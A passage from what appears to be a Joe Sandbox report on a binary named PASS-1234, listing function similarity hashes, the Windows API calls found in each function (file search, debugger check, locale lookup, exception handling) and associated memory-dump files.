          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: "$0$LM$eqXO$p
          • API String ID: 0-1349034001
          • Opcode ID: 1e9454f5645868c1fc9872f90d377f3a56da5a2d4634adeb45710c9d1cfa847a
          • Instruction ID: 1be6efc26d109b9b585974d59990b8b76153e6f7129dd58c4e07176c80e9a5f9
          • Opcode Fuzzy Hash: 1e9454f5645868c1fc9872f90d377f3a56da5a2d4634adeb45710c9d1cfa847a
          • Instruction Fuzzy Hash: 4F0202B05083818BE324CF14C494BAFBBE2BBC6344F148D2DE5D58B291D779D949CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00D960CA
          • FindNextFileW.KERNEL32(00000000,?), ref: 00D96145
          • FindClose.KERNEL32(00000000), ref: 00D96167
          • FindClose.KERNEL32(00000000), ref: 00D9618A
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: Find$CloseFile$FirstNext
          • String ID:
          • API String ID: 1164774033-0
          • Opcode ID: 6fc05640486e9ee8b3d72c5cef7f2fe2ebb8e59045b720b6c078bc40588b087e
          • Instruction ID: a24a774914c8caddabeabbaa1371b024323e2035605afbb013e3b086c0c34abb
          • Opcode Fuzzy Hash: 6fc05640486e9ee8b3d72c5cef7f2fe2ebb8e59045b720b6c078bc40588b087e
          • Instruction Fuzzy Hash: BF41C471A00729AFDF30EFA8DD89ABAB778EB85344F044195E409A3145EA31DE84CB70
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D3F7C6
          • IsDebuggerPresent.KERNEL32 ref: 00D3F892
          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D3F8AB
          • UnhandledExceptionFilter.KERNEL32(?), ref: 00D3F8B5
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
          • String ID:
          • API String ID: 254469556-0
          • Opcode ID: 116be2ff95d1e2becceb3220773a924fb438d62a418817d7ce669aaf633ae860
          • Instruction ID: a3d6c63351e542f66f5a27cb7e065824f13b4f0a91c719e4521e27e06326da80
          • Opcode Fuzzy Hash: 116be2ff95d1e2becceb3220773a924fb438d62a418817d7ce669aaf633ae860
          • Instruction Fuzzy Hash: D53118B5D0121DDBDB20DF65D849BCDBBB8BF08700F1041AAE50CAB290EB719A858F54
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 00D14B51
          • FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 00D14B78
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: FormatInfoLocaleMessage
          • String ID: !x-sys-default-locale
          • API String ID: 4235545615-2729719199
          • Opcode ID: d102e60bf9a994588640d1de5141a0a4c6f241d16526eacc298ed0253289b912
          • Instruction ID: f7d063631cab5e301befcf49523fef2ac1743f38b37784a50aa3ba7e35480b22
          • Opcode Fuzzy Hash: d102e60bf9a994588640d1de5141a0a4c6f241d16526eacc298ed0253289b912
          • Instruction Fuzzy Hash: CFF030B5114104FFEF249B95DC0AEFB76ACEB08750F004119B906E6180E6B0AE449B74
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9B5EC
          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9B636
          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9B6FC
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: InfoLocale
          • String ID:
          • API String ID: 2299586839-0
          • Opcode ID: 5ffb22ac9bee32ace2c26a4df73616bb28fe487819f49a8d4bdd456d9cc8116c
          • Instruction ID: ba04fad3e1c835fc89ca6f0ee20f9d1111ebf598e5a56c8c4a2ac2bf4bb012fe
          • Opcode Fuzzy Hash: 5ffb22ac9bee32ace2c26a4df73616bb28fe487819f49a8d4bdd456d9cc8116c
          • Instruction Fuzzy Hash: 9361D771500207AFDF24AF68EE82BBA73A8EF44320F15417AE905C6285F734E945CB70
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • IsDebuggerPresent.KERNEL32 ref: 00D50A4D
          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D50A57
          • UnhandledExceptionFilter.KERNEL32(?), ref: 00D50A64
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: ExceptionFilterUnhandled$DebuggerPresent
          • String ID:
          • API String ID: 3906539128-0
          • Opcode ID: 5c8e0e3bff0acd5bfb1332ff40aeb0eeb72d8ccbd660a3201712094e85eb7b27
          • Instruction ID: e6a331d97b2ffbbac817389c468eeb14f77b4c79f49ea2e1fd00e70b07d0f167
          • Opcode Fuzzy Hash: 5c8e0e3bff0acd5bfb1332ff40aeb0eeb72d8ccbd660a3201712094e85eb7b27
          • Instruction Fuzzy Hash: BF31C474D012189BCB21DF68D889B8DBBB8BF08710F5441EAE91CA6291EB709F858F55
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: %6):$+g.+$\39$
          • API String ID: 0-3210216783
          • Opcode ID: 164e5001d0aecdc3b6f4891b1e5fc3f163bd4169f991abc45fb1449726db336f
          • Instruction ID: 97995cd5b65a568b8054d6cddb485ee9852c4d8aeda4acd7c8127eced9e04025
          • Opcode Fuzzy Hash: 164e5001d0aecdc3b6f4891b1e5fc3f163bd4169f991abc45fb1449726db336f
          • Instruction Fuzzy Hash: 1CC1DEB1A083518FD754DF29C88076FB7E2EF95314F198A2DE9C997341E734D9048BA2
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: \yF{$z%h+$z%h+
          • API String ID: 0-2872817344
          • Opcode ID: 73d779323e47310392a2b5a4eb3294e2bb562480c3cbc2f58e14341da36f259f
          • Instruction ID: 9b22e7a99ead5cf07af6d902ff23cb151e618076b20d3f8c9094d57cdf9b75bd
          • Opcode Fuzzy Hash: 73d779323e47310392a2b5a4eb3294e2bb562480c3cbc2f58e14341da36f259f
          • Instruction Fuzzy Hash: 1E9179B05083818BD724DF05C8907ABBBF1FF96354F548A1CE8D59B291E774D909CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: '-$onih
          • API String ID: 0-4148150686
          • Opcode ID: 9f0cb009a36ac737dff4faea41c9af5d0d022eee21946816083b70b896abdad5
          • Instruction ID: 25e03e87c2a63217492a45f35b9a6e562dde02212af2c9af49ab7853a90fc934
          • Opcode Fuzzy Hash: 9f0cb009a36ac737dff4faea41c9af5d0d022eee21946816083b70b896abdad5
          • Instruction Fuzzy Hash: 3C91BFB15043458BDB14EF19C8A1B7BB3E9EF91324F19461CE8929B291E734E914CBB2
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: ^Q$(
          • API String ID: 0-2745640452
          • Opcode ID: a93bb09a9a647818fc34d264137a83322e7314be0be2c296838f03de3fcb84d7
          • Instruction ID: 4951a2fa3789863e3cde004bff0c48e34353fca30141fb76be2e3ef7dfb0d816
          • Opcode Fuzzy Hash: a93bb09a9a647818fc34d264137a83322e7314be0be2c296838f03de3fcb84d7
          • Instruction Fuzzy Hash: 1BC13AB110C3828FD725CF15C460B9BBBE1BF86314F18495DE4E59B392C779990ACBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: R-,T$R-,T
          • API String ID: 0-2000385741
          • Opcode ID: 4e0b7fcea2d5c73d1a19326fadbecc7e17abfabdc55ad0f60886167dd3c2433f
          • Instruction ID: 9032299e13bf401e58f5954ddc9566890b0f4580964e76112a3ad1bb8782427b
          • Opcode Fuzzy Hash: 4e0b7fcea2d5c73d1a19326fadbecc7e17abfabdc55ad0f60886167dd3c2433f
          • Instruction Fuzzy Hash: 66B1C0766043128FC714CF18C89066BB7E1FF88718F599A5CE895AB391D730DD85CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: /
          • API String ID: 0-2043925204
          • Opcode ID: d3d5ab11590ced84852cb8ecfe555fe2748af63acdf9b97a6e9bbcde906cb256
          • Instruction ID: d9b8a1f7d543955274435a41e04617fae8a3ab7607aa758f20bc37fe34fe6301
          • Opcode Fuzzy Hash: d3d5ab11590ced84852cb8ecfe555fe2748af63acdf9b97a6e9bbcde906cb256
          • Instruction Fuzzy Hash: FF925EB2E506199BDB18DEA8CC95BEE77A4EB14340F184139F516E72C0EF78D9089B70
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1d17fdaa40aa548899b8bcb223fc4a2a7378d80abef51246846fdaac76b0e842
          • Instruction ID: 8b98fa6845567ea5286621bb49096bcacb225cd954324db28e90b01a82eda43d
          • Opcode Fuzzy Hash: 1d17fdaa40aa548899b8bcb223fc4a2a7378d80abef51246846fdaac76b0e842
          • Instruction Fuzzy Hash: 2451D3B5800619AFDF24DFA8DC89AAAB7B9EF45304F1841ADF40DD3245EA319E418F70
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RaiseException.KERNEL32(C000000D,00000000,00000001,?), ref: 00D91AE7
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: ExceptionRaise
          • String ID:
          • API String ID: 3997070919-0
          • Opcode ID: 98dad0438b44c7c173ef59c9cebd6855b30235b3920afce834c5a7f7cc9da37a
          • Instruction ID: 737f74044771f2d85abbf6abb3ba1fde60f0f8d6019544551390f59b4b5d4b3c
          • Opcode Fuzzy Hash: 98dad0438b44c7c173ef59c9cebd6855b30235b3920afce834c5a7f7cc9da37a
          • Instruction Fuzzy Hash: C4B13C39610606DFDB15CF18C486B647BA1FF45369F298658E8DACF2A1C335ED82CB50
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
